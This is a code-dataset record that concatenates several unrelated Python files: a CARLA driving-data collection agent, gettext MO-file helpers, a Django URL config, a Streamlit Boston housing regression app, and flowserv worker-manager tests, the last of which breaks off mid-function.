] | 552 | 2020-04-20T01:07:02.000Z | 2022-03-31T16:47:39.000Z | d4rl/carla/data_collection_agent_lane.py | chappers/d4rl | b838da60b51c98c1d673a81657f58a44ccf5d3fe | [
"Apache-2.0"
] | 103 | 2020-04-20T14:18:32.000Z | 2022-03-30T14:33:45.000Z | d4rl/carla/data_collection_agent_lane.py | chappers/d4rl | b838da60b51c98c1d673a81657f58a44ccf5d3fe | [
"Apache-2.0"
] | 135 | 2020-04-21T16:57:52.000Z | 2022-03-30T14:29:55.000Z | # !/usr/bin/env python
# Copyright (c) 2019 Computer Vision Center (CVC) at the Universitat Autonoma de
# Barcelona (UAB).
#
# This work is licensed under the terms of the MIT license.
# For a copy, see <https://opensource.org/licenses/MIT>.
#
# Modified by Rowan McAllister on 20 April 2020
import argparse
import datetime
import glob
import os
import random
import sys
import time
from PIL import Image
from PIL.PngImagePlugin import PngInfo
try:
sys.path.append(glob.glob('../carla/dist/carla-*%d.%d-%s.egg' % (
sys.version_info.major,
sys.version_info.minor,
'win-amd64' if os.name == 'nt' else 'linux-x86_64'))[0])
except IndexError:
pass
import carla
import math
from dotmap import DotMap
try:
import pygame
except ImportError:
raise RuntimeError('cannot import pygame, make sure pygame package is installed')
try:
import numpy as np
except ImportError:
raise RuntimeError('cannot import numpy, make sure numpy package is installed')
try:
import queue
except ImportError:
import Queue as queue
from agents.navigation.agent import Agent, AgentState
from agents.navigation.local_planner import LocalPlanner
from agents.navigation.global_route_planner import GlobalRoutePlanner
from agents.tools.misc import is_within_distance_ahead, compute_magnitude_angle
from agents.navigation.global_route_planner_dao import GlobalRoutePlannerDAO
def is_within_distance(target_location, current_location, orientation, max_distance, d_angle_th_up, d_angle_th_low=0):
    """
    Check if a target object is within a certain distance from a reference object.
    A vehicle in front would be something around 0 deg, while one behind around 180 deg.

    :param target_location: location of the target object
    :param current_location: location of the reference object
    :param orientation: orientation of the reference object, in degrees
    :param max_distance: maximum allowed distance
    :param d_angle_th_up: upper threshold for the angle, in degrees
    :param d_angle_th_low: lower threshold for the angle (optional, default 0)
    :return: True if the target lies inside the distance/angle window
    """
    dx = target_location.x - current_location.x
    dy = target_location.y - current_location.y
    offset = np.array([dx, dy])
    distance = np.linalg.norm(offset)

    # Degenerate case: target essentially on top of the reference object.
    if distance < 0.001:
        return True
    if distance > max_distance:
        return False

    heading = math.radians(orientation)
    forward = np.array([math.cos(heading), math.sin(heading)])
    # Angle between the reference heading and the direction to the target.
    cos_angle = np.clip(np.dot(forward, offset) / distance, -1., 1.)
    angle = math.degrees(math.acos(cos_angle))
    return d_angle_th_low < angle < d_angle_th_up
def compute_distance(location_1, location_2):
    """
    Euclidean distance between two 3D points.

    A tiny epsilon is added so the result is never exactly zero (safe to
    divide by).

    :param location_1, location_2: objects with x/y/z coordinates
    """
    delta = [location_2.x - location_1.x,
             location_2.y - location_1.y,
             location_2.z - location_1.z]
    return np.linalg.norm(delta) + np.finfo(float).eps
class CarlaSyncMode(object):
    """
    Context manager to synchronize output from different sensors. Synchronous
    mode is enabled as long as we are inside this context

        with CarlaSyncMode(world, sensors) as sync_mode:
            while True:
                data = sync_mode.tick(timeout=1.0)
    """

    def __init__(self, world, *sensors, **kwargs):
        self.world = world
        self.sensors = sensors
        self.frame = None
        # Fixed simulation step derived from the requested frame rate.
        self.delta_seconds = 1.0 / kwargs.get('fps', 20)
        self._queues = []
        self._settings = None
        self.start()

    def start(self):
        """Switch the world to synchronous mode and attach a queue to every event source."""
        self._settings = self.world.get_settings()
        self.frame = self.world.apply_settings(carla.WorldSettings(
            no_rendering_mode=False,
            synchronous_mode=True,
            fixed_delta_seconds=self.delta_seconds))

        def make_queue(register_event):
            q = queue.Queue()
            register_event(q.put)
            self._queues.append(q)

        make_queue(self.world.on_tick)
        for sensor in self.sensors:
            make_queue(sensor.listen)

    def __enter__(self):
        # Bug fix: the docstring advertises `with CarlaSyncMode(...)` usage,
        # but no __enter__ was defined, so the `with` statement failed.
        # Synchronous mode is already enabled by __init__ via start().
        return self

    def tick(self, timeout):
        """Advance the simulation one step and return the matching item from every queue."""
        self.frame = self.world.tick()
        data = [self._retrieve_data(q, timeout) for q in self._queues]
        # Every sensor item must belong to the frame we just ticked.
        assert all(x.frame == self.frame for x in data)
        return data

    def __exit__(self, *args, **kwargs):
        # Restore the settings captured in start() (disables synchronous mode).
        self.world.apply_settings(self._settings)

    def _retrieve_data(self, sensor_queue, timeout):
        # Discard stale items until one matches the current frame.
        while True:
            data = sensor_queue.get(timeout=timeout)
            if data.frame == self.frame:
                return data
def draw_image(surface, image, blend=False):
    """Blit a carla camera image (BGRA byte buffer) onto a pygame surface.

    :param blend: when True, draw the image semi-transparently.
    """
    raw = np.frombuffer(image.raw_data, dtype=np.dtype("uint8"))
    bgra = np.reshape(raw, (image.height, image.width, 4))
    rgb = bgra[:, :, :3][:, :, ::-1]  # drop alpha, then BGR -> RGB
    image_surface = pygame.surfarray.make_surface(rgb.swapaxes(0, 1))
    if blend:
        image_surface.set_alpha(100)
    surface.blit(image_surface, (0, 0))
def get_font():
    """Return a 14pt pygame font, preferring 'ubuntumono' when installed."""
    available = list(pygame.font.get_fonts())
    if 'ubuntumono' in available:
        chosen = 'ubuntumono'
    else:
        chosen = available[0]
    return pygame.font.Font(pygame.font.match_font(chosen), 14)
def should_quit():
    """Return True when the user closed the window or released Escape."""
    for event in pygame.event.get():
        quit_requested = event.type == pygame.QUIT
        escape_released = event.type == pygame.KEYUP and event.key == pygame.K_ESCAPE
        if quit_requested or escape_released:
            return True
    return False
def clamp(value, minimum=0.0, maximum=100.0):
    """Restrict *value* to the range [minimum, maximum]."""
    upper_bounded = min(value, maximum)
    return max(minimum, upper_bounded)
class Sun(object):
    """Simple sun model: azimuth drifts linearly while altitude follows a cosine."""

    def __init__(self, azimuth, altitude):
        self.azimuth = azimuth
        self.altitude = altitude
        self._t = 0.0  # phase of the altitude oscillation, in radians

    def tick(self, delta_seconds):
        """Advance the sun state by *delta_seconds* simulated seconds."""
        self._t = (self._t + 0.008 * delta_seconds) % (2.0 * math.pi)
        self.azimuth = (self.azimuth + 0.25 * delta_seconds) % 360.0
        # Altitude oscillates between 20 and 90 degrees as the phase advances.
        min_alt, max_alt = 20, 90
        mid = 0.5 * (max_alt + min_alt)
        amplitude = 0.5 * (max_alt - min_alt)
        self.altitude = mid + amplitude * math.cos(self._t)

    def __str__(self):
        return 'Sun(alt: %.2f, azm: %.2f)' % (self.altitude, self.azimuth)
class Storm(object):
    """Storm model whose intensity ramps up and down over time.

    The internal parameter `_t` sweeps between -250 and 100; all weather
    quantities are clamped functions of it, so they saturate at their limits.
    """

    def __init__(self, precipitation):
        # Start from the current precipitation, or deep in the "dry" range.
        self._t = precipitation if precipitation > 0.0 else -50.0
        self._increasing = True
        self.clouds = 0.0
        self.rain = 0.0
        self.wetness = 0.0
        self.puddles = 0.0
        self.wind = 0.0
        self.fog = 0.0

    def tick(self, delta_seconds):
        """Advance the storm by *delta_seconds* simulated seconds."""
        delta = (1.3 if self._increasing else -1.3) * delta_seconds
        self._t = clamp(delta + self._t, -250.0, 100.0)
        # Fix: the original assigned clouds twice in a row; only the 60-capped
        # value ever took effect, so the 90-capped assignment was dead code.
        self.clouds = clamp(self._t + 40.0, 0.0, 60.0)
        self.rain = clamp(self._t, 0.0, 80.0)
        # Puddles lag behind on the way up and linger on the way down.
        delay = -10.0 if self._increasing else 90.0
        self.puddles = clamp(self._t + delay, 0.0, 85.0)
        self.wetness = clamp(self._t * 5, 0.0, 100.0)
        # Wind is a step function of cloud cover (with clouds capped at 60,
        # the 90-wind branch is unreachable; kept for behavioral parity).
        self.wind = 5.0 if self.clouds <= 20 else 90 if self.clouds >= 70 else 40
        self.fog = clamp(self._t - 10, 0.0, 30.0)
        # Reverse direction at the extremes so the storm oscillates.
        if self._t == -250.0:
            self._increasing = True
        if self._t == 100.0:
            self._increasing = False

    def __str__(self):
        return 'Storm(clouds=%d%%, rain=%d%%, wind=%d%%)' % (self.clouds, self.rain, self.wind)
class Weather(object):
    """Drives the carla world's weather by composing a Sun and a Storm model."""
    def __init__(self, world, changing_weather_speed):
        self.world = world
        self.reset()
        self.weather = world.get_weather()
        # How many simulated seconds each tick() advances the sun/storm models.
        self.changing_weather_speed = changing_weather_speed
        self._sun = Sun(self.weather.sun_azimuth_angle, self.weather.sun_altitude_angle)
        self._storm = Storm(self.weather.precipitation)
    def reset(self):
        # Start from clear weather with the sun at its zenith.
        weather_params = carla.WeatherParameters(sun_altitude_angle=90.)
        self.world.set_weather(weather_params)
    def tick(self):
        # Advance both sub-models, then push the combined state to the world.
        self._sun.tick(self.changing_weather_speed)
        self._storm.tick(self.changing_weather_speed)
        self.weather.cloudiness = self._storm.clouds
        self.weather.precipitation = self._storm.rain
        self.weather.precipitation_deposits = self._storm.puddles
        self.weather.wind_intensity = self._storm.wind
        self.weather.fog_density = self._storm.fog
        self.weather.wetness = self._storm.wetness
        self.weather.sun_azimuth_angle = self._sun.azimuth
        self.weather.sun_altitude_angle = self._sun.altitude
        self.world.set_weather(self.weather)
    def __str__(self):
        return '%s %s' % (self._sun, self._storm)
def parse_args():
    """Parse the data-collection command line flags and return the namespace."""
    parser = argparse.ArgumentParser()
    parser.add_argument('--vision_size', type=int, default=84)
    parser.add_argument('--vision_fov', type=int, default=90)
    parser.add_argument('--weather', default=False, action='store_true')
    # NOTE(review): the trailing commas after two add_argument calls below are
    # harmless no-ops (the expression value is discarded).
    parser.add_argument('--frame_skip', type=int, default=1),
    parser.add_argument('--steps', type=int, default=100000)
    parser.add_argument('--multiagent', default=False, action='store_true'),
    parser.add_argument('--lane', type=int, default=0)
    parser.add_argument('--lights', default=False, action='store_true')
    args = parser.parse_args()
    return args
class LocalPlannerModified(LocalPlanner):
    """LocalPlanner with two overrides needed for clean data collection."""
    def __del__(self):
        pass  # otherwise it deletes our vehicle object
    def run_step(self):
        return super().run_step(debug=False)  # otherwise by default shows waypoints, that interfere with our camera
class RoamingAgent(Agent):
    """
    RoamingAgent implements a basic agent that navigates scenes making random
    choices when facing an intersection.
    This agent respects traffic lights and other vehicles.
    NOTE: need to re-create after each env reset
    """
    def __init__(self, env):
        """
        :param env: environment wrapper providing the vehicle to apply the
            local planner logic onto and the follow_traffic_lights flag.
        """
        vehicle = env.vehicle
        follow_traffic_lights = env.follow_traffic_lights
        super(RoamingAgent, self).__init__(vehicle)
        self._proximity_threshold = 10.0  # meters
        self._state = AgentState.NAVIGATING
        self._local_planner = LocalPlannerModified(self._vehicle)
        self._follow_traffic_lights = follow_traffic_lights
    def compute_action(self):
        """Map the planner's VehicleControl onto a 2D action array.

        :return: np.array([throttle, steer]) when not braking, otherwise
            np.array([-brake, steer]) (braking encoded as a negative first
            component).
        """
        action, traffic_light = self.run_step()
        throttle = action.throttle
        brake = action.brake
        steer = action.steer
        #print('tbsl:', throttle, brake, steer, traffic_light)
        if brake == 0.0:
            return np.array([throttle, steer])
        else:
            return np.array([-brake, steer])
    def run_step(self):
        """
        Execute one step of navigation.
        :return: tuple of (carla.VehicleControl, traffic light color string)
        """
        # is there an obstacle in front of us?
        hazard_detected = False
        # retrieve relevant elements for safe navigation, i.e.: traffic lights and other vehicles
        actor_list = self._world.get_actors()
        vehicle_list = actor_list.filter("*vehicle*")
        lights_list = actor_list.filter("*traffic_light*")
        # check possible obstacles
        vehicle_state, vehicle = self._is_vehicle_hazard(vehicle_list)
        if vehicle_state:
            self._state = AgentState.BLOCKED_BY_VEHICLE
            hazard_detected = True
        # check for the state of the traffic lights
        traffic_light_color = self._is_light_red(lights_list)
        if traffic_light_color == 'RED' and self._follow_traffic_lights:
            self._state = AgentState.BLOCKED_RED_LIGHT
            hazard_detected = True
        if hazard_detected:
            control = self.emergency_stop()
        else:
            self._state = AgentState.NAVIGATING
            # standard local planner behavior
            control = self._local_planner.run_step()
        #print ('Action chosen: ', control)
        return control, traffic_light_color
    # override case class
    def _is_light_red_europe_style(self, lights_list):
        """
        This method is specialized to check European style traffic lights.
        Only suitable for Towns 03 -- 07.
        :return: "RED", "YELLOW", "GREEN" or "NONE" (no relevant light seen).
        """
        ego_vehicle_location = self._vehicle.get_location()
        ego_vehicle_waypoint = self._map.get_waypoint(ego_vehicle_location)
        traffic_light_color = "NONE"  # default, if no traffic lights are seen
        for traffic_light in lights_list:
            object_waypoint = self._map.get_waypoint(traffic_light.get_location())
            # Only consider lights on the ego vehicle's road and lane.
            if object_waypoint.road_id != ego_vehicle_waypoint.road_id or \
                    object_waypoint.lane_id != ego_vehicle_waypoint.lane_id:
                continue
            if is_within_distance_ahead(traffic_light.get_transform(),
                                        self._vehicle.get_transform(),
                                        self._proximity_threshold):
                if traffic_light.state == carla.TrafficLightState.Red:
                    return "RED"
                elif traffic_light.state == carla.TrafficLightState.Yellow:
                    traffic_light_color = "YELLOW"
                elif traffic_light.state == carla.TrafficLightState.Green:
                    # BUGFIX: was `is not "YELLOW"` — identity comparison with
                    # a string literal is unreliable; use value comparison.
                    if traffic_light_color != "YELLOW":  # (more severe)
                        traffic_light_color = "GREEN"
                else:
                    # NOTE(review): debugger left in for unhandled states
                    # (Off/Unknown); kept to preserve behavior — consider
                    # logging instead.
                    import pdb; pdb.set_trace()
                    # investigate https://carla.readthedocs.io/en/latest/python_api/#carlatrafficlightstate
        return traffic_light_color
    # override case class
    def _is_light_red_us_style(self, lights_list, debug=False):
        """US-style traffic-light check based on distance/angle to the light.

        :return: "RED", "YELLOW", "GREEN", "NONE", or "JUNCTION" when already
            inside the intersection.
        """
        ego_vehicle_location = self._vehicle.get_location()
        ego_vehicle_waypoint = self._map.get_waypoint(ego_vehicle_location)
        traffic_light_color = "NONE"  # default, if no traffic lights are seen
        if ego_vehicle_waypoint.is_junction:
            # It is too late. Do not block the intersection! Keep going!
            return "JUNCTION"
        if self._local_planner.target_waypoint is not None:
            if self._local_planner.target_waypoint.is_junction:
                min_angle = 180.0
                sel_magnitude = 0.0
                sel_traffic_light = None
                # Pick the closest light within 60 m and 25 degrees of heading.
                for traffic_light in lights_list:
                    loc = traffic_light.get_location()
                    magnitude, angle = compute_magnitude_angle(loc,
                                                               ego_vehicle_location,
                                                               self._vehicle.get_transform().rotation.yaw)
                    if magnitude < 60.0 and angle < min(25.0, min_angle):
                        sel_magnitude = magnitude
                        sel_traffic_light = traffic_light
                        min_angle = angle
                if sel_traffic_light is not None:
                    if debug:
                        print('=== Magnitude = {} | Angle = {} | ID = {}'.format(
                            sel_magnitude, min_angle, sel_traffic_light.id))
                    if self._last_traffic_light is None:
                        self._last_traffic_light = sel_traffic_light
                    if self._last_traffic_light.state == carla.TrafficLightState.Red:
                        return "RED"
                    elif self._last_traffic_light.state == carla.TrafficLightState.Yellow:
                        traffic_light_color = "YELLOW"
                    elif self._last_traffic_light.state == carla.TrafficLightState.Green:
                        # BUGFIX: was `is not "YELLOW"` — identity comparison
                        # with a string literal; use value comparison.
                        if traffic_light_color != "YELLOW":  # (more severe)
                            traffic_light_color = "GREEN"
                    else:
                        # NOTE(review): debugger left in for unhandled states;
                        # kept to preserve behavior.
                        import pdb; pdb.set_trace()
                        # investigate https://carla.readthedocs.io/en/latest/python_api/#carlatrafficlightstate
                else:
                    self._last_traffic_light = None
        return traffic_light_color
if __name__ == '__main__':
    # example call:
    # ./PythonAPI/util/config.py --map Town01 --delta-seconds 0.05
    # python PythonAPI/carla/agents/navigation/data_collection_agent.py --vision_size 256 --vision_fov 90 --steps 10000 --weather --lights
    args = parse_args()
    env = CarlaEnv(args)
    try:
        done = False
        while not done:
            action, traffic_light_color = env.compute_action()
            next_obs, reward, done, info = env.step(action, traffic_light_color)
            print ('Reward: ', reward, 'Done: ', done, 'Location: ', env.vehicle.get_location())
            if done:
                # env.reset_init()
                # env.reset()
                # NOTE(review): clearing `done` here means the loop never
                # exits on episode end (env reset calls are commented out);
                # presumably the script is meant to run until killed or until
                # the env terminates internally — confirm intent.
                done = False
    finally:
        # Always release simulator resources, even on exceptions/interrupts.
        env.finish()
| 36.34632 | 138 | 0.632861 | 11,283 | 0.671927 | 0 | 0 | 0 | 0 | 0 | 0 | 3,600 | 0.214388 |
2189e908a5d40835988cf4b8179b93819c50451d | 2,386 | py | Python | wren/pomo.py | kthy/wren | 62e9439ea82a1d984f07fa8cd00421e0e640196f | [
"MIT"
] | 1 | 2021-06-04T07:15:02.000Z | 2021-06-04T07:15:02.000Z | wren/pomo.py | kthy/wren | 62e9439ea82a1d984f07fa8cd00421e0e640196f | [
"MIT"
] | 9 | 2021-02-20T22:33:05.000Z | 2021-04-12T17:35:48.000Z | wren/pomo.py | pyxy-dk/wren | 62e9439ea82a1d984f07fa8cd00421e0e640196f | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
"""Gettext manipulation methods."""
from os import remove
from os.path import exists
from pathlib import Path
from shutil import copyfile, copystat
from typing import Sequence
from filehash import FileHash
from polib import MOFile, POFile, mofile
from wren.change import Change
def apply_changes(mo_file: MOFile, changelist: Sequence[Change]) -> None:
    """Run every change in *changelist* against *mo_file*, in order."""
    for pending_change in changelist:
        pending_change.apply(mo_file)
def backup_original_mo(wowsdir: str, locale: str) -> None:
    """Copy the original `global.mo` to `global.mo.original`."""
    source = _global_mo_path(wowsdir, locale)
    destination = _backup_mo_path(wowsdir, locale)
    _copyfile_and_checksum(source, destination)
def convert_mo_to_po(wowsdir: str, locale: str, outputdir: str) -> POFile:
    """Save the MO file for the given locale in PO format.

    NOTE(review): the annotation promises a POFile but the function returns
    None (save_as_pofile writes to disk) — confirm the intended contract.
    """
    source_path = Path(_global_mo_path(wowsdir, locale))
    if not exists(source_path):
        raise OSError(f"MO file for locale {locale} not found")
    mofile(source_path).save_as_pofile(f"{outputdir}/{source_path.stem}_{locale}.po")
def get_mo(wowsdir: str, locale: str) -> MOFile:
    """Open and return the global MO file in the given directory."""
    catalogue_path = _global_mo_path(wowsdir, locale)
    return mofile(catalogue_path)
def restore_original_mo(wowsdir: str, locale: str) -> None:
    """Reinstate the original `global.mo` from `global.mo.original`."""
    target = _global_mo_path(wowsdir, locale)
    backup = _backup_mo_path(wowsdir, locale)
    # Nothing to restore when no backup was ever made.
    if not exists(backup):
        return
    _copyfile_and_checksum(backup, target)
    remove(backup)
def _copyfile_and_checksum(from_path, to_path) -> None:
    """Copy a file (contents and stat metadata) from from_path to to_path.

    Raises OSError if the copy's MD5 checksum doesn't match the original.
    """
    copyfile(from_path, to_path)
    copystat(from_path, to_path)
    md5 = FileHash("md5")
    source_digest = md5.hash_file(from_path)
    copy_digest = md5.hash_file(to_path)
    if source_digest != copy_digest:
        raise OSError("Copy failed, hash mismatch detected")
def _backup_mo_path(wowsdir: str, locale: str) -> str:
    """Path of the backup copy: the global MO path plus `.original`."""
    return _global_mo_path(wowsdir, locale) + ".original"
def _global_mo_path(wowsdir: str, locale: str) -> str:
    """Path of the game's `global.mo` catalogue for *locale* under *wowsdir*."""
    return "/".join([wowsdir, "res", "texts", locale, "LC_MESSAGES", "global.mo"])
| 34.57971 | 80 | 0.725482 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 727 | 0.304694 |
218b02aeb89c1d716160e75933fbb97fec67090f | 199 | py | Python | mysite/polls/urls.py | cs-fullstack-fall-2018/django-intro1-psanon19 | 0ae36780fd664313a011e7a219bc401b158fe93f | [
"Apache-2.0"
] | null | null | null | mysite/polls/urls.py | cs-fullstack-fall-2018/django-intro1-psanon19 | 0ae36780fd664313a011e7a219bc401b158fe93f | [
"Apache-2.0"
] | null | null | null | mysite/polls/urls.py | cs-fullstack-fall-2018/django-intro1-psanon19 | 0ae36780fd664313a011e7a219bc401b158fe93f | [
"Apache-2.0"
] | null | null | null | from django.urls import path
from . import views
# Route table for the polls app; each entry maps a URL prefix to a view
# function defined in views.py.
urlpatterns = [
    path('language/', views.language),
    path('system/', views.system),
    path('ide/', views.ide),
    path('', views.nothing)  # app root
]
218b26291a3fa107e3de76aeb9676ea1fe58456c | 5,908 | py | Python | Boston_House_Prices.py | Anuska-Ghosh2002/bostonproj | fa3e55ea8417d58a84a66b11dc093d106bd10c79 | [
"MIT"
] | null | null | null | Boston_House_Prices.py | Anuska-Ghosh2002/bostonproj | fa3e55ea8417d58a84a66b11dc093d106bd10c79 | [
"MIT"
] | null | null | null | Boston_House_Prices.py | Anuska-Ghosh2002/bostonproj | fa3e55ea8417d58a84a66b11dc093d106bd10c79 | [
"MIT"
] | null | null | null | import streamlit as st
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
import seaborn as sns
sns.set()
from sklearn.datasets import load_boston
from sklearn import preprocessing
from sklearn.model_selection import train_test_split
from sklearn.linear_model import LinearRegression
from sklearn.metrics import r2_score
# title
st.title('Linear regression on Boston house prices')
# Read the dataset (sklearn's bundled Boston housing data)
dataset = load_boston()
df = pd.DataFrame(dataset.data)
# Assign the columns into df
df.columns = dataset.feature_names
# Assign the target variable (house prices) as an extra column
df["PRICES"] = dataset.target
# Show the table data when the user ticks the checkbox
if st.checkbox('Show the dataset as table data'):
	st.dataframe(df)
# Explanatory variable names, in the dataset's column order; the inline
# comments describe each Boston-housing feature.
FeaturesName = [\
  #-- "Crime occurrence rate per unit population by town"
  "CRIM",\
  #-- "Percentage of 25000-squared-feet-area house"
  'ZN',\
  #-- "Percentage of non-retail land area by town"
  'INDUS',\
  #-- "Index for Charlse river: 0 is near, 1 is far"
  'CHAS',\
  #-- "Nitrogen compound concentration"
  'NOX',\
  #-- "Average number of rooms per residence"
  'RM',\
  #-- "Percentage of buildings built before 1940"
  'AGE',\
  #-- 'Weighted distance from five employment centers'
  "DIS",\
  ##-- "Index for easy access to highway"
  'RAD',\
  ##-- "Tax rate per $100,000"
  'TAX',\
  ##-- "Percentage of students and teachers in each town"
  'PTRATIO',\
  ##-- "1000(Bk - 0.63)^2, where Bk is the percentage of Black people"
  'B',\
  ##-- "Percentage of low-class population"
  'LSTAT',\
  ]
# Check an exmple, "Target" vs each variable
if st.checkbox('Show the relation between "Target" vs each variable'):
checked_variable = st.selectbox(
'Select one variable:',
FeaturesName
)
# Plot
fig, ax = plt.subplots(figsize=(5, 3))
ax.scatter(x=df[checked_variable], y=df["PRICES"])
plt.xlabel(checked_variable)
plt.ylabel("PRICES")
st.pyplot(fig)
"""
## Preprocessing
"""
# Select the variables NOT to be used
Features_chosen = []
Features_NonUsed = st.multiselect(
'Select the variables NOT to be used',
FeaturesName)
df = df.drop(columns=Features_NonUsed)
# Perform the logarithmic transformation
left_column, right_column = st.beta_columns(2)
bool_log = left_column.radio(
'Perform the logarithmic transformation?',
('No','Yes')
)
df_log, Log_Features = df.copy(), []
if bool_log == 'Yes':
Log_Features = right_column.multiselect(
'Select the variables you perform the logarithmic transformation',
df.columns
)
# Perform logarithmic transformation
df_log[Log_Features] = np.log(df_log[Log_Features])
# Perform the standardization
left_column, right_column = st.beta_columns(2)
bool_std = left_column.radio(
'Perform the standardization?',
('No','Yes')
)
df_std = df_log.copy()
if bool_std == 'Yes':
Std_Features_chosen = []
Std_Features_NonUsed = right_column.multiselect(
'Select the variables NOT to be standardized (categorical variables)',
df_log.drop(columns=["PRICES"]).columns
)
for name in df_log.drop(columns=["PRICES"]).columns:
if name in Std_Features_NonUsed:
continue
else:
Std_Features_chosen.append(name)
# Perform standardization
sscaler = preprocessing.StandardScaler()
sscaler.fit(df_std[Std_Features_chosen])
df_std[Std_Features_chosen] = sscaler.transform(df_std[Std_Features_chosen])
"""
### Split the dataset
"""
left_column, right_column = st.beta_columns(2)
test_size = left_column.number_input(
'Validation-dataset size (rate: 0.0-1.0):',
min_value=0.0,
max_value=1.0,
value=0.2,
step=0.1,
)
random_seed = right_column.number_input('Set random seed (0-):',
value=0, step=1,
min_value=0)
X_train, X_val, Y_train, Y_val = train_test_split(
df_std.drop(columns=["PRICES"]),
df_std['PRICES'],
test_size=test_size,
random_state=random_seed
)
# Create a regression-model instance
regressor = LinearRegression()
regressor.fit(X_train, Y_train)
Y_pred_train = regressor.predict(X_train)
Y_pred_val = regressor.predict(X_val)
# Inverse logarithmic transformation if necessary
if "PRICES" in Log_Features:
Y_pred_train, Y_pred_val = np.exp(Y_pred_train), np.exp(Y_pred_val)
Y_train, Y_val = np.exp(Y_train), np.exp(Y_val)
"""
## Show the result
### Check R2 socre
"""
R2 = r2_score(Y_val, Y_pred_val)
st.write(f'R2 score: {R2:.2f}')
"""
### Plot the result
"""
left_column, right_column = st.beta_columns(2)
show_train = left_column.radio(
'Show the training dataset:',
('Yes','No')
)
show_val = right_column.radio(
'Show the validation dataset:',
('Yes','No')
)
# default axis range
y_max_train = max([max(Y_train), max(Y_pred_train)])
y_max_val = max([max(Y_val), max(Y_pred_val)])
y_max = int(max([y_max_train, y_max_val]))
# interactive axis range
left_column, right_column = st.beta_columns(2)
x_min = left_column.number_input('x_min:',value=0,step=1)
x_max = right_column.number_input('x_max:',value=y_max,step=1)
left_column, right_column = st.beta_columns(2)
y_min = left_column.number_input('y_min:',value=0,step=1)
y_max = right_column.number_input('y_max:',value=y_max,step=1)
fig = plt.figure(figsize=(3, 3))
if show_train == 'Yes':
plt.scatter(Y_train, Y_pred_train,lw=0.1,color="r",label="training data")
if show_val == 'Yes':
plt.scatter(Y_val, Y_pred_val,lw=0.1,color="b",label="validation data")
plt.xlabel("PRICES",fontsize=8)
plt.ylabel("PRICES of prediction",fontsize=8)
plt.xlim(int(x_min), int(x_max)+5)
plt.ylim(int(y_min), int(y_max)+5)
plt.legend(fontsize=6)
plt.tick_params(labelsize=6)
st.pyplot(fig)
| 28.403846 | 82 | 0.676202 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2,048 | 0.346649 |
218bab7ad0514bef0bd2c2671ceec38449ab044f | 4,585 | py | Python | tests/controller/worker/test_worker_manager.py | scailfin/flowserv-core | 69376f84bae71b5699688bd213c34a6bf8806319 | [
"MIT"
] | 1 | 2020-02-13T18:57:53.000Z | 2020-02-13T18:57:53.000Z | tests/controller/worker/test_worker_manager.py | scailfin/flowserv-core | 69376f84bae71b5699688bd213c34a6bf8806319 | [
"MIT"
] | 46 | 2020-02-14T22:14:33.000Z | 2021-06-10T21:17:49.000Z | tests/controller/worker/test_worker_manager.py | scailfin/rob-core | 791383085181747cf41c30f6cd13f6762e438d8a | [
"MIT"
] | 3 | 2021-05-06T15:22:29.000Z | 2021-06-01T16:19:36.000Z | # This file is part of the Reproducible and Reusable Data Analysis Workflow
# Server (flowServ).
#
# Copyright (C) 2019-2021 NYU.
#
# flowServ is free software; you can redistribute it and/or modify it under the
# terms of the MIT License; see LICENSE file for more details.
"""Unit tests for the worker factory."""
import pytest
from flowserv.controller.worker.code import CodeWorker
from flowserv.controller.worker.docker import DockerWorker
from flowserv.controller.worker.manager import WorkerPool, Code, Docker, Notebook, Subprocess
from flowserv.controller.worker.notebook import NotebookEngine
from flowserv.controller.worker.subprocess import SubprocessWorker
from flowserv.model.workflow.step import CodeStep, ContainerStep, NotebookStep
import flowserv.error as err
# NOTE(review): the first two ContainerStep cases are identical — possibly an
# unintended duplicate.
@pytest.mark.parametrize(
    'step,cls',
    [
        (ContainerStep(identifier='test', image='test'), SubprocessWorker),
        (ContainerStep(identifier='test', image='test'), SubprocessWorker),
        (CodeStep(identifier='test', func=lambda x: x), CodeWorker),
        (NotebookStep(identifier='test', notebook='helloworld.ipynb'), NotebookEngine)
    ]
)
def test_get_default_worker(step, cls):
    """Test getting a default worker for a workflow step that has no manager
    explicitly assigned to it.
    """
    # An empty pool forces the per-step-type default worker selection.
    factory = WorkerPool(workers=[])
    assert isinstance(factory.get_default_worker(step), cls)
def test_get_worker_error():
    """Test error when accessing worker with unknown identifier."""
    step = ContainerStep(identifier='test', image='test')
    # Manager maps the step to worker 'test' which is not in the pool.
    factory = WorkerPool(workers=[], managers={'test': 'test'})
    with pytest.raises(err.UnknownObjectError):
        factory.get(step)
    # Manipulate the worker type to get an error for unknown type.
    doc = Code(identifier='test')
    doc['type'] = 'unknown'
    factory = WorkerPool(workers=[doc], managers={'test': 'test'})
    with pytest.raises(ValueError):
        factory.get(step)
    # Manipulate the step type to get an error for unknown type.
    step.step_type = 'unknown'
    factory = WorkerPool(workers=[])
    with pytest.raises(ValueError):
        factory.get(step)
@pytest.mark.parametrize(
    'doc,step,cls',
    [
        (Subprocess(identifier='test'), ContainerStep(identifier='test', image='test'), SubprocessWorker),
        (Docker(identifier='test'), ContainerStep(identifier='test', image='test'), DockerWorker),
        (Code(identifier='test'), CodeStep(identifier='test', func=lambda x: x), CodeWorker),
        (Notebook(identifier='test'), NotebookStep(identifier='test', notebook='helloworld.ipynb'), NotebookEngine),
    ]
)
def test_get_worker_instance(doc, step, cls):
    """Test creating worker instances from specification documents."""
    factory = WorkerPool(workers=[doc], managers={step.name: doc['name']})
    worker = factory.get(step)
    assert isinstance(worker, cls)
    # Run twice to account for the cached object.
    assert factory.get(step) == worker
def test_init_empty():
    """Test creating a worker factory from an empty dictionary."""
    factory = WorkerPool(workers=list())
    # No worker specifications should be registered.
    assert len(factory._workerspecs) == 0
# NOTE(review): function name has a typo ("seriaization"); kept because pytest
# discovers it by the test_ prefix and renaming is out of scope here. The
# local `vars` below also shadows the builtin.
def test_worker_spec_seriaization():
    """Test helper function for generating dictionary serializations for worker
    specifications.
    """
    # -- Config without additional arguments. ---------------------------------
    doc = Code(identifier='D1')
    assert doc == {'name': 'D1', 'type': 'code', 'env': [], 'variables': []}
    doc = Docker(identifier='D1')
    assert doc == {'name': 'D1', 'type': 'docker', 'env': [], 'variables': []}
    doc = Subprocess(identifier='S1')
    assert doc == {'name': 'S1', 'type': 'subprocess', 'env': [], 'variables': []}
    # -- Config with arguments ------------------------------------------------
